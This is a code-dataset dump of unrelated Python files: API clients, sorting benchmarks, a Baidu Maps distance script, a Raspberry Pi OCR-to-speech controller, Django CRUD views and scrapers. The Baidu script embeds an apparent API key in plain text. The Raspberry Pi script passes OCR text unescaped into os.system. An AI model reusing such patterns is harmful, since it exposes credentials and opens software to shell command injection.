__setattr__(self, name, value):\n nameC = underscore_to_camelcase(name)\n if nameC in self._json:\n if nameC in self._editable_fields:\n self._json[nameC] = value\n else:\n raise ValueError('Value readonly: %s' % name)\n else:\n super(Resource, self).__setattr__(name, value)\n\n def __cmp__(self, other):\n if self._id_field_name:\n return self.__getattr__(self._id_field_name) - other.__getattr__(self._id_field_name)\n else:\n super(Resource, self).__cmp__(other)\n\n # def __repr__(self):\n # id_string = ''\n # if self._id_field_name:\n # id_string = ' %s=%s' % (self._id_field_name, self.__getattr__(self._id_field_name))\n # return '<%s%s at %s>' % (type(self).__name__, id_string, hex(id(self)))\n\n\nclass Asset(Resource):\n _id_field_name = 'id'\n\n @classmethod\n def create(cls, **kwargs):\n files = None\n file_opend = False\n file_obj = None\n\n try:\n if \"file_path\" in kwargs:\n file_obj = open(kwargs.pop('file_path'), 'rb')\n file_opend = True\n\n elif \"file\" in kwargs:\n file_obj = kwargs.pop('file')\n\n elif \"url\" not in kwargs:\n raise PwintyException(\"file_path, file OR url required\")\n\n if file_obj:\n md5 = hashlib.md5(file_obj.read()).hexdigest()\n file_obj.seek(0) # The file will be read again for transmission\n filename = os.path.basename(file_obj.name)\n files = {'file': (filename, file_obj, 'image/jpeg')} # pwinty requires mime\n kwargs['md5Hash'] = md5\n\n finally:\n if file_opend:\n file_obj.close()\n\n return cls(kwargs)\n\nclass PhotoAssets(object):\n _asset_list = []\n\n def __init__(self, order_id):\n self._order_id = order_id\n\n def create(self, **kwargs):\n asset = Asset.create(**kwargs)\n self._asset_list.append(asset)\n return asset\n\n def all(self):\n return [o._json for o in self._asset_list]\n\n def clear(self):\n self._asset_list[:] = []\n return self._asset_list\n\nclass Photo(Resource):\n _id_field_name = 'id'\n _assets = []\n _attributes = ('finish',)\n\n\n @classmethod\n def create(cls, **kwargs):\n attributes = {}\n\n for name in cls._attributes:\n if name in kwargs:\n attributes[name] = kwargs.pop(name)\n\n kwargs['attributes'] = attributes\n\n return cls(kwargs)\n\n @property\n def assets(self):\n return PhotoAssets(self)\n\n def refresh(self):\n self._json['assets'] = self.assets.all()\n self.assets.clear()\n return self._json\n\n\n\nclass OrderPhotos(object):\n _photo_list = []\n\n def __init__(self, order_id):\n self._order_id = order_id\n\n def create(self, **kwargs):\n photo = Photo.create(**kwargs)\n self._photo_list.append(photo)\n return photo\n\n def get(self, id):\n return Photo.get(self._order_id, id)\n\n def all(self):\n return [o._json for o in self._photo_list]\n\n def clear(self):\n self._photo_list[:] = []\n return self._photo_list\n\n\nclass Order(Resource):\n _id_field_name = 'id'\n _editable_fields = ('name', 'line1', 'line2', 'townOrCity', 'stateOrCounty', 'postalOrZipCode', 'preferredShippingMethod',)\n _recipient = ('name',)\n _address = ('line1', 'line2', 'townOrCity', 'stateOrCounty', 'postalOrZipCode', 'countryCode',)\n\n\n @classmethod\n def create(cls, **kwargs):\n #take input and json-ize it immediately\n options = {}\n recipient = {}\n\n if 'line2' in kwargs :\n if kwargs['line2'] == '':\n kwargs.pop('line2')\n\n for name in cls._recipient:\n if name in kwargs:\n recipient[name] = kwargs.pop(name)\n\n for name in cls._address:\n if name in kwargs:\n options[name] = kwargs.pop(name)\n\n recipient['address'] = options\n kwargs['recipient'] = recipient\n\n return cls(kwargs)\n\n def save(self):\n options = {}\n for name in self._editable_fields:\n if name in self._json:\n options[name] = self._json[name]\n self._json = res # Update this object with any changes\n\n @property\n def photos(self):\n return OrderPhotos(self)\n\n def submit(self):\n self._json['items'] = self.photos.all()\n self.photos.clear()\n res = _request('Orders', 'POST', data=self._json)\n return res\n\n @classmethod\n def get(cls, id):\n res = _request('Orders/ord_%s' % id, 'GET')\n return cls(res)\n\nclass PwintyException(Exception):\n pass\n\n\nclass PwintyError(PwintyException):\n def __init__(self, message, response, status_code):\n self.message = message\n self.response = response\n self.status_code = status_code\n\n def __str__(self):\n return '%s (%s)' % (self.message, self.status_code)\n\n\nclass PwintyBadInputError(PwintyError):\n def __init__(self, message, response):\n super(PwintyBadInputError, self).__init__(message, response, 400)\n\n\nclass PwintyForbiddenError(PwintyError):\n def __init__(self, message, response):\n super(PwintyForbiddenError, self).__init__(message, response, 403)\n\n\nclass PwintyMissingError(PwintyError):\n def __init__(self, message, response):\n super(PwintyMissingError, self).__init__(message, response, 404)\n\n\nclass PwintyServerError(PwintyError):\n def __init__(self, message, response):\n super(PwintyServerError, self).__init__(message, response, 500)\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n\n\n","sub_path":"pwinty/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428028953","text":"import random\nfrom copy import copy\nimport time\n\n# 스택 구현\n\nclass Stack:\n def __init__(self):\n self.items = []\n\n def push(self, val):\n self.items.append(val)\n\n def pop(self):\n try:\n return self.items.pop()\n except IndexError:\n print(\"Stack is empty\")\n\n def top(self):\n try:\n return self.items[-1]\n except:\n print(\"Stack is empty\")\n\n def __len__(self):\n return len(self.items)\n\n def isEmpty(self):\n return self.__len__() == 0\n\n# 퀵 정렬 (재귀 사용)\ndef RQuickSort(arr):\n \n if len(arr) <= 1:\n \n return arr\n\n pivot = arr[len(arr) // 2]\n\n left = [x for x in arr if x < pivot]\n\n middle = [x for x in arr if x == pivot]\n\n right = [x for x in arr if x > pivot]\n\n return RQuickSort(left) + middle + RQuickSort(right)\n\n# 재귀 호출을 쓰지 않는 퀵 정렬 \n\ndef SQuickSort(input):\n pivotIndex = 0\n leftIndex = pivotIndex + 1\n rightIndex = len(input) - 1\n\n s = Stack()\n \n s.push(pivotIndex)\n s.push(rightIndex)\n\n while len(s.items) > 0:\n\n rightIndexOfSubSet = s.pop()\n leftIndexOfSubSet = s.pop()\n\n leftIndex = leftIndexOfSubSet + 1\n pivotIndex = leftIndexOfSubSet\n rightIndex = rightIndexOfSubSet\n \n pivot = input[pivotIndex]\n\n if leftIndex > rightIndex:\n continue\n\n while leftIndex < rightIndex:\n while (leftIndex <= rightIndex) and (input[leftIndex] <= pivot):\n leftIndex += 1\n\n while (leftIndex <= rightIndex) and (input[rightIndex] >= pivot):\n rightIndex -= 1\n\n if rightIndex >= leftIndex:\n SwapElement(input, leftIndex, rightIndex)\n\n\n if pivotIndex <= rightIndex:\n if input[pivotIndex] > input[rightIndex]:\n SwapElement(input, pivotIndex, rightIndex)\n\n if leftIndexOfSubSet < rightIndex:\n s.push(leftIndexOfSubSet)\n s.push(rightIndex - 1)\n\n if rightIndexOfSubSet > rightIndex:\n s.push(rightIndex + 1)\n s.push(rightIndexOfSubSet)\n\ndef SwapElement(arr, left, right):\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n\n\n\n\nstuGroup = []\nstuInfo = [0, 0, 0]\nstuNum = 50000\ninterval = 500\n\n\nfor i in range(stuNum):\n\n ID = '20'\n \n randNum = random.randint(13, 19)\n\n ID += str(randNum)\n\n for i in range(5):\n\n randNum = random.randint(0,9)\n \n ID += str(randNum)\n\n stuInfo[0] = int(ID)\n\n name = chr(random.randint(65,90))\n\n for i in range(9):\n\n randNum = random.randint(65, 90)\n \n name += chr(randNum)\n\n stuInfo[1] = name\n \n telNum = '010'\n\n for i in range(8):\n\n randNum = random.randint(0, 9)\n\n telNum += str(randNum)\n\n stuInfo[2] = telNum\n \n stuGroup.append(copy(stuInfo))\n\n\nRQstuGroup = copy(stuGroup)\n\ntimeB = time.time()\n\nRQstuGroup = RQuickSort(RQstuGroup)\n\ntimeA = time.time()\n\ntimeForR = timeA - timeB\n\nprint('퀵 정렬(재귀 사용)하는데 걸린 시간은:', timeForR, '초 입니다.')\n\nfor i in range(0, stuNum, interval):\n print(RQstuGroup[i])\nprint()\n\n\n\nSQstuGroup = copy(stuGroup)\n\ntimeB = time.time()\n\nSQuickSort(SQstuGroup)\n\ntimeA = time.time()\n\ntimeForS = timeA - timeB\n\nprint('퀵 정렬(재귀 사용 X)하는데 걸린 시간은:', timeForS, '초 입니다.')\n\nfor i in range(0, stuNum, interval):\n print(SQstuGroup[i])\nprint()\n\nif timeForR < timeForS:\n print('재귀 호출을 사용한 퀵 정렬이', timeForS-timeForR ,'초 더 빠릅니다.')\nelif timeForS < timeForR:\n print('재귀 호출을 사용하지 않은 퀵 정렬이', timeForR-timeForS ,'초 더 빠릅니다.')\nelse:\n print('속도가 같습니다.')\n","sub_path":"datastructure-cpython/sort/비재귀호출버전.py","file_name":"비재귀호출버전.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453121758","text":"import requests\nimport xlwings as xw\n\ncity_workbook = xw.Book('city_list.xlsx')\ncity_sheet = city_workbook.sheets[0]\ncity_list = city_sheet.range('a1').expand('table').value\n\nak = 'IxULBTs4uW26i9apebsyOupEP6STZDEw'\ngeocoding_url = 'http://api.map.baidu.com/geocoding/v3/'\ndirection_url = 'http://api.map.baidu.com/directionlite/v1/driving?origin={:.6f},{:.6f}&destination={:.6f},{:.6f}&ak=' + ak\n\ncity_cord = []\ncount = 1\nfor city in city_list:\n print(count)\n count += 1\n geocoding_param = {'address': city, 'ak': ak, 'output': 'json'}\n geocoding_request = requests.get(geocoding_url, geocoding_param)\n geocoding_result = geocoding_request.json()\n while geocoding_result['status'] != 0:\n print(geocoding_request.url)\n geocoding_request = requests.get(geocoding_url, geocoding_param)\n geocoding_result = geocoding_request.json()\n lng = geocoding_result['result']['location']['lng']\n lat = geocoding_result['result']['location']['lat']\n city_cord.append((lat, lng))\n\nprint(len(city_list) == len(city_cord))\n\ntable = []\ncount_1 = 1\nfor city_1 in city_cord:\n row = []\n count_2 = 1\n for city_2 in city_cord:\n direction_request = requests.get(direction_url.format(city_1[0], city_1[1], city_2[0], city_2[1]))\n direction_result = direction_request.json()\n if direction_result['status'] == 0:\n distance = direction_result['result']['routes'][0]['distance'] / 1000\n else:\n distance = 0\n row.append(distance)\n print(count_1, count_2, distance)\n count_2 += 1\n table.append(row)\n count_1 += 1\n\ncity_distance_workbook = xw.Book()\ncity_distance_sheet = city_distance_workbook.sheets[0]\ncity_distance_sheet.range('a1').value = table\ncity_distance_workbook.save('city_distance.xlsx')\n","sub_path":"city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"352612631","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 23 15:28:27 2020\n\n@author: user\n\"\"\"\n\nimport librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nsr = 44100\n\n# %% ============== EXERCISE 1.2 ==============================\n\n# load files\n# eh\neh , _ = librosa.load('audio_files/eh.wav', sr)\n# oh\noh , _ = librosa.load('audio_files/oh.wav', sr)\n# th\nth , _ = librosa.load('audio_files/th.wav', sr)\n# dd\ndd , _ = librosa.load('audio_files/dd.wav', sr)\n\n# plot first 4410 samples from each waveforms (0.1 sec)\nplt.subplot(221)\nplt.plot( eh[:4410] ); plt.title('ah')\nplt.subplot(222)\nplt.plot( oh[:4410] ); plt.title('oh')\nplt.subplot(223)\nplt.plot( th[:4410] ); plt.title('th')\nplt.subplot(224)\nplt.plot( dd[:4410] ); plt.title('dd')\n\n\n# %% ============== EXERCISE 1.3 ==============================\n# \n# waveforms of 'eh', 'oh', 'dd' appear to be periodic\n# waveform of 'th' appears to be aperiodic\n# waveform of 'dd' is rough in comparison to 'ed' and 'od'","sub_path":"solutions_to_exercises/ex_1.py","file_name":"ex_1.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"280382166","text":"from periscope.models.chemokine import Chemokine\n\n\nvegfa = Chemokine(['VEGFA'], \"Vascular endothelial growth factor A\", ['P15692'])\nartn = Chemokine(['ARTN'], \"Artemin\", ['Q5T4W7'])\ncxcl11 = Chemokine(['CXCL11'], \"C-X-C motif chemokine 11\", ['O14625'])\nmcp1 = Chemokine(['MCP-1', 'MCP1', 'CCL2', 'SCYA2', 'MCAF', 'HC11'], \"C-C motif chemokine 2\", ['P13500'])\nccl28 = Chemokine(['CCL28'], \"C-C motif chemokine 28\", ['Q9NRJ3'])\nccl20 = Chemokine(['CCL20'], \"C-C motif chemokine 20\", ['P78556'])\nccl11 = Chemokine(['CCL11'], \"Eotaxin\", ['P51671'])\nil6 = Chemokine(['IL6', 'IL-6'], \"Interleukin-6\", ['P05231'])\ncsf1 = Chemokine(['CSF1', 'CSF-1'], \"Macrophage colony-stimulating factor 1\", ['P09603'])\nenrage = Chemokine(['S100A12', 'EN-RAGE'], \"Protein S100-A12\", ['P80511'])\nccl23 = Chemokine(['CCL23'], \"C-C motif chemokine 23\", ['P55773'])\nccl19 = Chemokine(['CCL19'], \"C-C motif chemokine 19\", ['Q99731'])\nccl3 = Chemokine(['CCL3'], \"C-C motif chemokine 3\", ['P10147'])\ncxcl10 = Chemokine(['CXCL10'], \"C-X-C motif chemokine 10\", ['P02778'])\ncx3cl1 = Chemokine(['CX3CL1'], \"Fractalkine\", ['P78423'])\nccl4 = Chemokine(['CCL4'], \"C-C motif chemokine 4\", ['P13236'])\nmcp2 = Chemokine(['MCP2', 'MCP-2'], \"C-C motif chemokine 8\", ['P80075'])\nhgf = Chemokine(['HGF'], \"Hepatocyte growth factor\", ['P14210'])\ntnfsf14 = Chemokine(['TNFSF14'], \"Tumor necrosis factor ligand superfamily member 14\", ['O43557'])\ncxcl1 = Chemokine(['CXCL1'], \"Growth-regulated alpha protein\", ['P09341'])\ncxcl5 = Chemokine(['CXCL5'], \"C-X-C motif chemokine 5\", ['P42830'])\nupa = Chemokine(['uPA', 'PLAU'], \"Urokinase-type plasminogen activator\", ['P00749'])\nil8 = Chemokine(['IL-8', 'IL8'], \"Interleukin-8\", ['P10145'])\ncxcl6 = Chemokine(['CXCL6'], \"C-X-C motif chemokine 6\", ['P80162'])\ncxcl9 = Chemokine(['CXCL9'], \"C-X-C motif chemokine 9\", ['Q07325'])\nlaptgfb1 = Chemokine(['LAP TGF-beta-1', 'LAP TGFB1', 'LAP TGB-beta-1'], \"Transforming growth factor beta-1 proprotein\", ['P01137'])\n\nchemokines = [vegfa, artn, cxcl11, mcp1, ccl28, ccl20, ccl11, il6, csf1, enrage, ccl23, ccl19, ccl3, cxcl10, cx3cl1,\n ccl4, mcp2, hgf, tnfsf14, cxcl1, cxcl5, upa, il8, cxcl6, cxcl9, laptgfb1]\n","sub_path":"periscope/domain/chemokine.py","file_name":"chemokine.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88455774","text":"import asyncio\n\nimport aioredis\n\n\nasync def main():\n redis = aioredis.from_url(\n \"redis://localhost\", encoding=\"utf-8\", decode_responses=True\n )\n\n async with redis.client() as conn:\n await conn.set(\"my_key\", \"my_value\")\n val = await conn.get(\"my_key\")\n print(val)\n\n\nasync def redis_pool():\n redis = aioredis.from_url(\n \"redis://localhost\", encoding=\"utf-8\", decode_responses=True\n )\n await redis.set(\"kkkkkk\", \"1234567\")\n val = await redis.get(\"kkkkkk\")\n print(val)\n\n\n# asyncio.run(main())\nasyncio.run(redis_pool())\n","sub_path":"asyncio/youtuoo/async_demos/s2/s4.py","file_name":"s4.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"324432349","text":"import os\nimport os.path as osp\nimport posixpath as px\nfrom typing import List, Dict, Set, Union\nimport re\n\n\ndef alpha_num_order(string: str) -> str:\n \"\"\" Returns all numbers on 5 digits to let sort the string with numeric order.\n Ex: alphaNumOrder(\"a6b12.125\") ==> \"a00006b00012.00125\"\n \"\"\"\n return ''.join([format(int(x), '05d') if x.isdigit()\n else x for x in re.split(r'(\\d+)', string)])\n\n\ndef add_to_dict(dictionary: dict, key: Union[int, str], value: Union[dict, set, list]) -> dict:\n \"\"\" Will add key-value pair to dictionary, otherwise will update key-value pair \"\"\"\n if key in dictionary:\n key_present = True\n child_value_type = type(dictionary[key])\n else:\n key_present = False\n child_value_type = type(value)\n\n if key_present:\n\n if child_value_type is list:\n dictionary[key].extend(value)\n else:\n dictionary[key].update(value)\n else:\n dictionary[key] = value\n return dictionary\n\n\ndef get_img_listing(in_dir: str) -> List[str]:\n allowed_extensions = ('.tif', '.tiff')\n listing = os.listdir(in_dir)\n img_listing = [f for f in listing if f.endswith(allowed_extensions)]\n return img_listing\n\n\ndef extract_digits_from_string(string: str):\n digits = [int(x) for x in re.split(r'(\\d+)', string) if x.isdigit()] # '1_00001_Z02_CH3' -> ['1', '00001', '02', '3']\n return digits\n\n\ndef create_arrangement_skeleton_by_channel_tile_zplane(listing: List[str]) -> Dict[int, Dict[int, Set[int]]]:\n tile_arrangement = dict()\n for file_name in listing:\n digits = extract_digits_from_string(file_name)\n tile = digits[1]\n zplane = digits[2]\n channel = digits[3]\n tile_arrangement = add_to_dict(tile_arrangement, channel, {})\n tile_arrangement[channel] = add_to_dict(tile_arrangement[channel], tile, {zplane})\n\n return tile_arrangement\n\n\ndef arrange_listing(img_dir: str, listing: List[str]) -> Dict[int, Dict[int, Dict[int, str]]]:\n pattern = \"1_{tile:05d}_Z{zplane:03d}_CH{channel:d}.tif\"\n\n tile_arrangement = create_arrangement_skeleton_by_channel_tile_zplane(listing)\n\n arranged_listing = dict()\n for channel in tile_arrangement:\n for tile in tile_arrangement[channel]:\n for zplane in tile_arrangement[channel][tile]:\n file_name = pattern.format(tile=tile, zplane=zplane, channel=channel)\n file_path = px.join(img_dir, file_name)\n arranged_listing = add_to_dict(arranged_listing, channel, {})\n arranged_listing[channel] = add_to_dict(arranged_listing[channel], tile, {zplane: file_path})\n\n return arranged_listing\n\n\ndef get_image_paths_arranged_in_dict(img_dir: str):\n img_listing = get_img_listing(img_dir)\n arranged_listing = arrange_listing(img_dir, img_listing)\n\n return arranged_listing\n","sub_path":"image_paths_arrangement.py","file_name":"image_paths_arrangement.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"17906365","text":"from selenium import webdriver\nimport time\n\n\ndef search(question, user_num):\n driver = webdriver.Chrome()\n url_search = 'https://zhidao.baidu.com/'\n driver.get(url_search)\n driver.find_element_by_xpath('//*[@id=\"kw\"]').send_keys(question)\n driver.find_element_by_xpath('//*[@id=\"search-btn\"]').click()\n time.sleep(3)\n if driver.find_elements_by_class_name('answer'):\n answer = driver.find_elements_by_class_name('answer')[user_num].text.strip('答:')\n driver.close()\n return answer\n else:\n driver.close()\n return False","sub_path":"search_question.py","file_name":"search_question.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125538163","text":"from decimal import Decimal\nfrom typing import List, Union\n\nfrom ...asset import Asset\nfrom ...call_builder.base import BaseStrictSendPathsCallBuilder\nfrom ...call_builder.call_builder_sync.base_call_builder import BaseCallBuilder\nfrom ...client.base_sync_client import BaseSyncClient\nfrom ...type_checked import type_checked\n\n__all__ = [\"StrictSendPathsCallBuilder\"]\n\n\n@type_checked\nclass StrictSendPathsCallBuilder(BaseCallBuilder, BaseStrictSendPathsCallBuilder):\n \"\"\"Creates a new :class:`StrictSendPathsCallBuilder` pointed to server defined by horizon_url.\n Do not create this object directly, use :func:`stellar_sdk.Server.strict_send_paths`.\n\n The Stellar Network allows payments to be made across assets through path\n payments. A strict send path payment specifies a series of assets to route a\n payment through, from source asset (the asset debited from the payer) to\n destination asset (the asset credited to the payee).\n\n A strict send path search is specified using:\n\n - The source asset\n - The source amount\n - The destination assets or destination account.\n\n As part of the search, horizon will load a list of assets available to the\n source address and will find any payment paths from those source assets to\n the desired destination asset. The search's source_amount parameter will be\n used to determine if there a given path can satisfy a payment of the desired\n amount.\n\n See `List Strict Send Payment Paths `__ for more information.\n\n :param horizon_url: Horizon server URL.\n :param client: The client instance used to send request.\n :param source_asset: The asset to be sent.\n :param source_amount: The amount, denominated in the source asset, that any returned path should be able to satisfy.\n :param destination: The destination account or the destination assets.\n \"\"\"\n\n def __init__(\n self,\n horizon_url: str,\n client: BaseSyncClient,\n source_asset: Asset,\n source_amount: Union[str, Decimal],\n destination: Union[str, List[Asset]],\n ) -> None:\n super().__init__( # type: ignore[call-arg]\n horizon_url=horizon_url,\n client=client,\n source_asset=source_asset,\n source_amount=source_amount,\n destination=destination,\n )\n","sub_path":"stellar_sdk/call_builder/call_builder_sync/strict_send_paths_call_builder.py","file_name":"strict_send_paths_call_builder.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"305183996","text":"import argparse\nimport time, os, subprocess\nimport RPi.GPIO as GPIO\nimport wave, sys, pyaudio \n\n\n# Controls how to configure raspberry pins: Add more modes?\nap = argparse.ArgumentParser()\nap.add_argument(\"-s\", \"--scan\", default=True,\n help = \"Execute image reader\")\nap.add_argument(\"-r\", \"--reader\", default=False,\n help = \"Execute image reader\")\nap.add_argument('-a', '--ausgabe', help = 'How to convert text to speech')\nargs = vars(ap.parse_args())\n\n\n# Audio\ndef create_play(text, speed=0.93, language='de-DE'):\n '''transforms given text into a temporary wav file and plays it. \n text: words to be spoken\n speed: changes rate of sound [0-1]\n language: choose language see aplay -h'''\n\n os.system('''pico2wave -l {} -w /home/pi/hackdemyk/audio/temp.wav \"{}\"'''.format(language,text))\n sound = wave.open(\"/home/pi/hackdemyk/audio/temp.wav\")\n p = pyaudio.PyAudio()\n chunk = 1024\n stream = p.open(format =\n p.get_format_from_width(sound.getsampwidth()),\n channels = sound.getnchannels(),\n rate = int(sound.getframerate()*speed),\n output = True)\n data = sound.readframes(chunk)\n while True:\n if data != '':\n stream.write(data)\n data = sound.readframes(chunk)\n if data == b'':\n break\n\n# Initializing raspberrypi 3b + pins.\n#create_play(text='Das System is bereit. Drucken Sie auf den linken Knopf um Bilder aufzunehmen. Wenn sie fertig sind, drucken sie auf den rechten Knopf um die Textverarbeitung zu starten')\ncreate_play(text='Das System is bereit')\nif bool(args['scan']) == True:\n # RPi.GPIO Layout verwenden (wie Pin-Nummern)\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_UP) # When Button pressed, voltage received, taking a photo\n GPIO.setup(11, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n read = True\n count = 0\n while True:\n if GPIO.input(13) == False:\n create_play(text='Bild wird aufgenommen')\n os.system('python3 camera.py -n DEBUG{}'.format(count))\n count+=1\n time.sleep(2)\n print(\"Press Button@13 to take a picture\")\n create_play(speed=0.93, text='Drucken Sie erneut den gleichen Knopf um ein neues Bild aufzunehmen. Oder drucken Sie den rechten Knopf um Verarbeitung zu starten')\n print(\"Or Press Button@Pin11 to Extract Text\")\n if GPIO.input(11) == False:\n print('Initiating Text Extraction')\n mode='online'\n create_play(text='Verarbeitung gestartet')\n os.system(\"python3 images_to_text.py -f scanned_images -m {} -o results\".format(mode))\n break\nprint('Completed')\n\n\nextracted_text = open(\"/home/pi/hackdemyk/text_results/results.txt\",\"r\") \nto_read=extracted_text.read()\nextracted_text.close()\n\ncreate_play(text = to_read, language='de-DE')\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"507133419","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom .forms import EmployeerForm\nfrom .models import Employeer\nfrom django.contrib.auth.decorators import login_required\n\n\n\n# Create your views here.\ndef employeer(request):\n if request.method == 'POST':\n data = request.POST\n first_name = data['first_name']\n last_name = data['last_name']\n email = data['email']\n mobile = data['mobile']\n address = data['address']\n # save objects to Employeer model in database\n obj = Employeer.objects.create(first_name= first_name,last_name=last_name,email=email,\n mobile= mobile,address = address)\n\n # If objects is created then redirect to home page\n if obj:\n return redirect('employeer-home')\n\n else:\n Employeers = Employeer.objects.all()\n form = EmployeerForm()\n context = {\n 'form':form,\n 'employeers':Employeers,\n }\n return render(request,'employeer/employeer.html',context)\n\n # if request.method = request.POST:\n # data = request.POST\n # print(data)\n # # Two ways of accessing dictionary key value pairs\n # print(data['email'])\n # print(data.get('email'))\n # return render(request,'employeer/employeer.html')\n # else:\n # return render(request,'employeer/employeer.html')\n\n@login_required\ndef employeer_add(request):\n form = EmployeerForm()\n if request.method == 'POST':\n employeer_data = EmployeerForm(request.POST)\n if employeer_data.is_valid():\n employeer_data.save()\n return redirect('employeer-home')\n context = {\n 'form':form,\n 'action':'Add New employeer'\n }\n return render(request,'employeer/employeer_add.html',context)\n\n\n@login_required\ndef employeer_update(request,id):\n instance = Employeer.objects.get(id=id)\n form = EmployeerForm(instance=instance)\n if request.method == 'POST':\n form_data = EmployeerForm(request.POST,instance = instance)\n if form_data.is_valid():\n form_data.save()\n return redirect('employeer-home')\n context = {\n 'form':form,\n 'action':'Update Employeer Details'\n }\n # Using template similar to add for update employeer\n return render(request,'employeer/employeer_add.html',context)\n\n@login_required\ndef employeer_delete(request,id):\n employeer_instance = Employeer.objects.get(id=id)\n if request.method == 'POST':\n employeer_instance.delete()\n return redirect('employeer-home')\n context ={\n 'employeer': employeer_instance,\n }\n return render(request,'employeer/employeer_delete.html',context)\n","sub_path":"10. User authentication in CRUD application/employeer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"20509819","text":"# Battleships game playground\n\n\nclass Singleton(type):\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass Playground(metaclass=Singleton):\n\n @staticmethod\n def show(player1, player2, p1_show=True, p2_show=True):\n print(' A B C D E F G H I J A B C D E F G H I J')\n print(' ┌─────────────────────┐ ┌─────────────────────┐')\n for row in range(0, 10):\n print('{:2} │'.format(row + 1), end=' ')\n if p1_show:\n Playground.print_cells(row, player1.ships, player2.hits)\n else:\n print(' ', end='')\n print('│ {:2} │ '.format(row + 1), end='')\n if p2_show:\n Playground.print_cells(row, player2.ships, player1.hits)\n else:\n print(' ', end='')\n print('│ {:2}'.format(row + 1))\n print(' └─────────────────────┘ └─────────────────────┘')\n print(' A B C D E F G H I J A B C D E F G H I J')\n\n @staticmethod\n def print_cells(row, ships, hits):\n all_ships = []\n all_hits = []\n for ship in ships:\n all_ships.extend(ship.coordinates)\n for hit in hits:\n all_hits.append(hit.coordinate)\n for col in range(10):\n if ((row, col) in all_ships) and ((row, col) in all_hits):\n print('X', end=' ')\n elif (row, col) in all_ships:\n print('#', end=' ')\n elif (row, col) in all_hits:\n print('*', end=' ')\n else:\n print('•', end=' ')\n","sub_path":"lecture_07/battleships/playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595801858","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-i686/egg/harold/publishers/cheetahtemplate.py\n# Compiled at: 2006-08-02 05:57:50\nfrom Cheetah.Template import Template as CT\nfrom harold.publishers.common import TemplateMixin, request_args\n\nclass CheetahTemplate(TemplateMixin):\n \"\"\" Instances read Cheetah templates and render them.\n\n \"\"\"\n __module__ = __name__\n ext = '.tmpl'\n index = 'index.tmpl'\n\n class ref:\n __module__ = __name__\n src = 'non-empty string to supress warnings'\n module = CT(src)\n disallow = set(dir(module))\n\n def render(self, filename, args):\n \"\"\" After a template is located, the mixin calls this method\n to complete the rendering process.\n\n @param filename name of template module to import\n @param args sequence of additional items from the request\n @return rendered template\n \"\"\"\n try:\n method_name = args.pop(0)\n except (IndexError,):\n method_name = ''\n\n def simple():\n context = self.context()()\n search = [dict(args=args, form=self.form(), context=context), context]\n template = CT(file=filename, searchList=search)\n return str(template)\n\n if not method_name:\n return simple()\n context = self.context()\n search = [dict(args=args, form=self.form(), context=context()), context()]\n template = CT(file=filename, searchList=search)\n view_names = set(dir(template)) - self.ref.disallow\n if method_name not in view_names:\n args.insert(0, method_name)\n return simple()\n call = getattr(template, method_name)\n (cargs, ckwds) = request_args(call, args, self.form(), context)\n return call(*cargs, **ckwds)","sub_path":"pycfiles/cleverlab-0.0.3-py3-none-any/cheetahtemplate.py","file_name":"cheetahtemplate.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"296494871","text":"\"\"\"\npipeline designed to create/update active roster table within the NBA states database\n\"\"\"\n\nimport pymysql\nimport re\nimport requests\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom sqlalchemy import create_engine\n\ndef truncate_table(connection):\n truncate_table_statement = 'truncate table active_rosters'\n sql_execute(truncate_table_statement, connection)\n\ndef get_roster_links():\n roster_links = []\n link = 'http://www.espn.com/nba/teams'\n soup = BeautifulSoup(requests.get(link).content, 'html.parser')\n\n for i in soup.find_all('a', href=True):\n if '/nba/team/roster/' in i['href']:\n roster_links.append('http://www.espn.com{}'.format(i['href']))\n return 